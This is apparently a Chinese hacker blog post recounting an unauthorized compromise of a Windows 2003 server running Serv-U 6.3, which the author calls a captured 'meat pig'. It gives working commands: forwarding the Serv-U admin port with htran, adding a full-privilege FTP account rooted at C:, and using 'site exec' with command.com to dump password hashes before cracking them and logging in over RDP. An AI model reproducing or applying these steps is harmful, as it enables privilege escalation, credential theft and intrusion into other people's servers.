很久沒有從webshell to system 玩了。。剛抓了個肉豬，比較艱難啊..獲取webshell就不說了，很簡單的。關鍵提權非常非常艱難啊~目標 win2003，SU 6.3，本地密碼沒改，但是不是這麼簡單的，人家把cmd.exe net.exe net1.exe cacls.exe icacls.exe ftp.exe,5次shift 用的exe， 還有各種.cpl 全部設置了權限~很杯具吧~SU 服務沒有被降權處理過，所以，它肯定是system權限運行的~肯定有搞的~先用htran 把43958 轉出來~htran -p -tran 1234 127.0.0.1 43958 ,然後用su管理連接~然後加1條ftp號，設置成最高權限，目錄指向C盤~連接上去，確認下我猜測的情況~

~——– 意思就是system 對此程序無任何權限..

沒關係~

quote site exec command.com /c c:\windows\temp\hash $local >c:\111.txt

成功，等到hash，破豬，登陸3389，完畢。command 很少做安全的豬會注意到。

作者：hack520

文章链接：好久沒練手了。

短连接：https://zhu.vn/?p=153